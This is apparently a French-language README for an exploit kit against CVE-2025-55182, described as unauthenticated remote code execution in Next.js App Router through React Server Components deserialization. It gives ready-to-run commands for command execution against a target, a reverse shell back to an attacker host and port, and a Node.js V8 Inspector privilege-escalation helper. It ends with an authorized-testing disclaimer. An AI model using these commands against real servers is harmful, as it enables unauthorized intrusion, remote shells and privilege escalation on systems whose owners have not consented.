
Exploit autonome pour CVE-2025-55182 permettant une exécution de code à distance (RCE) non authentifiée dans Next.js App Router via la désérialisation Flight des React Server Components, avec shell inversé et assistant d'élévation de privilèges Node.js V8 Inspector.
Exploit autonome pour CVE-2025-55182 dans les applications Next.js App Router qui activent les React Server Components. Des payloads RSC Flight conçus pour le endpoint server-action permettent une exécution de code à distance non authentifiée. Inclut un assistant d'élévation de privilèges locale Node.js V8 Inspector (debug-port) qui exécute du code dans un processus privilégié via un contournement de sandbox process.mainModule.require.
CVE: CVE-2025-55182
python3 -m pip install requests # pour le(s) PoC Python
cdp_privesc.pypython3 cdp_privesc.py <cible>
react2shell-poc.pypython3 react2shell-poc.py -t http://TARGET:3000 -c "id" # exfiltration de commande basée sur les erreurs
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py est le PoC public de CVE-2025-55182 de p3ta00, fourni inchangé
depuis https://github.com/p3ta00/react2shell-poc pour une chaîne autonome.
cdp_privesc.py (l'élévation de privilèges locale Node.js V8 Inspector) est original.
Pour des tests de sécurité autorisés et à des fins éducatives uniquement. Exécutez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de tester.
Auteur : r3vpwnx